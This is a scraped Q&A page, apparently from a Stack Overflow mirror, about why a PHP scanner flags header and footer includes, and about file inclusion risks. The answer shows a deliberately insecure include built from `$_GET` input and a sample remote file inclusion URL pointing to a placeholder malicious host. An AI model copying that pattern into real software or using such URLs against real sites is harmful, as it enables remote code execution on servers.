<p>I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.</p> <p>The way I included the header and the footer file is </p> <pre class="prettyprint"><code><?php include 'inc/header.php'; some code some code include 'inc/header.php'; ?> </code></pre> <p>Everything simple and works fine. </p> <p>I decided to check my project for vulnerability and downloaded RIPS scanner. After the scan, the result</p> <pre class="prettyprint"><code>Userinput reaches sensitive sink. 5: include include 'inc/header.php'; // header.php requires: 5: if(!in_array($_GET['file'], $files)) else </code></pre> <p>which basically say that both header and footer are vulnerable and I should use </p> <pre class="prettyprint"><code>if(!in_array($_GET['file'], $files)) else </code></pre> <p>How come a simple include header and footer file be vulnerable? and if vulnerable, how should i implement if(!in_array($_GET['file'], $files)) else ??</p> <p><strong>header.php</strong></p> <pre class="prettyprint"><code><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" href="images/common/lbfavicon.ico" /> <meta name="author" content="example.com" /> <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" /> <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/> </head> <body> <div id="header-wrapper"> <div class="container"> <div id="nav"> <ul> <li><a href="./">Home</a></li> <li><a href="index.php?page=about">About</a></li> <li><a href="index.php?page=contact">Contact</a></li> </ul> </div> </div> </div> <div id="header"> <div class="container"> <div id="logo"> <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a> </div> <div id="search"> <form method="get" action="searchresult.php"> <div class="form-item"> Search: <input type="text" maxlength="120" name="searchfor" /> </div> </form> </div> </div> </div> <div class="container"> <div id="announcement"> <div id="breadcrumbs"></div> </div> <div id="pagewrapper"> </code></pre> <p><strong>Footer.php</strong></p> <pre class="prettyprint"><code> <div id="bottom"> <div class="column"> <h2>Abc.com</h2> <ul> <li><a href="about">About</a></li> <li><a href="contact">Contact</a></li> </ul> </div> <div class="column"> <h2>Mode of payment</h2> <ul> <li>Credit/Debit card | Cheque | Demand draft</li> </ul> <h2>Get in touch</h2> <ul> <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li> </ul> </div> <div class="column"> <h2>Call us / Mail us</h2> <ul> <li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li> </ul> <h2>Share us</h2> <ul> <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li> </ul> </div> <div style="clear: both;"></div> </div>  <div id="footer"> </div> </div>  </div> </body> </html> </code></pre>

<p>Well I suppose this is just a warning but in a global way, when you include .php scripts which names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).</p> <p>For example, a lot of websites use a "global" file that would include file according to requests coming from the user.</p> <p>Example :</p> <pre class="prettyprint"><code><?php $get = $_GET['action']; if ($get == "index") { include "includes/index.php"; } //... else { include $get .".php"; } </code></pre> <p>Now let's imagine someone want to include some malicious script within your website. If your server allow cross-website requests, then people could specify some external script that could be dangerous for your server or the others users.</p> <p>Example : ./global.php?action=http://malicious4ever.com/dirtything</p>

How come a simple PHP include file be vulnerable

I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.

The way I included the header and the footer file is

<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>

Everything simple and works fine.

I decided to check my project for vulnerability and downloaded RIPS scanner. After the scan, the result

Userinput reaches sensitive sink.

5: include include 'inc/header.php';  // header.php
requires:
     5: if(!in_array($_GET['file'], $files)) else

which basically say that both header and footer are vulnerable and I should use

if(!in_array($_GET['file'], $files)) else

How come a simple include header and footer file be vulnerable? and if vulnerable, how should i implement if(!in_array($_GET['file'], $files)) else ??

header.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="icon" href="images/common/lbfavicon.ico" />
    <meta name="author" content="example.com" />
    <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
    <div id="header-wrapper">
        <div class="container">
            <div id="nav">
                <ul>
                    <li><a href="./">Home</a></li>
                    <li><a href="index.php?page=about">About</a></li>
                    <li><a href="index.php?page=contact">Contact</a></li>
                </ul>
            </div><!-- nav ends -->
        </div><!-- container ends -->
    </div><!-- header wrapper ends -->

    <div id="header">
        <div class="container">
            <div id="logo">
                <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
            </div><!-- logo ends -->
            <div id="search">
                <form method="get" action="searchresult.php">
                    <div class="form-item">
                       Search: <input  type="text" maxlength="120" name="searchfor" />
                    </div>
                </form>
            </div><!-- search ends -->
        </div><!-- container ends-->
    </div><!-- header ends -->

    <div class="container">
        <div id="announcement">
            <div id="breadcrumbs"></div>
        </div><!-- announcement ends -->
        <div id="pagewrapper">

Footer.php

        <div id="bottom">
            <div class="column">
                <h2>Abc.com</h2>
                    <ul>
                        <li><a href="about">About</a></li>
                        <li><a href="contact">Contact</a></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Mode of payment</h2>
                    <ul>
                        <li>Credit/Debit card | Cheque | Demand draft</li>
                    </ul>
                <h2>Get in touch</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Call us / Mail us</h2>
                    <ul>
                        <li>0-9999384745 / <a href="mailto:[email protected]">[email protected]</a></li>
                    </ul>
                <h2>Share us</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div style="clear: both;"></div>
        </div> <!-- bottom ends -->

        <div id="footer">

        </div>

        </div> <!--Pagewrapper end-->
    </div>    
</body>
</html>

Which of the following functions in PHP is vulnerable for file includes attacks?

PHP websites that make use of include() function in an insecure way become vulnerable to file inclusion attacks.

What is the vulnerability called when you can include a remote file for malicious purposes?

Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator's goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain.

What are the types of file inclusion vulnerabilities?

Remote File Inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are often found in poorly-written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.

Well I suppose this is just a warning but in a global way, when you include .php scripts which names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).

For example, a lot of websites use a "global" file that would include file according to requests coming from the user.

Example :

<?php

$get = $_GET['action'];
if ($get == "index") {
   include "includes/index.php";
}
//...
else
{
   include $get .".php";
}

Now let's imagine someone want to include some malicious script within your website. If your server allow cross-website requests, then people could specify some external script that could be dangerous for your server or the others users.

Example : ./global.php?action=http://malicious4ever.com/dirtything

How come a simple PHP include file be vulnerable

Tags:

include

security

php

whitelist

Daksh B

People also ask

1 Answers

Cr3aHal0

Recent Activity

Donate For Us

How come a simple PHP include file be vulnerable

Tags:

include

security

php

whitelist

Daksh B

People also ask

1 Answers

Cr3aHal0

Related questions

Recent Activity

Donate For Us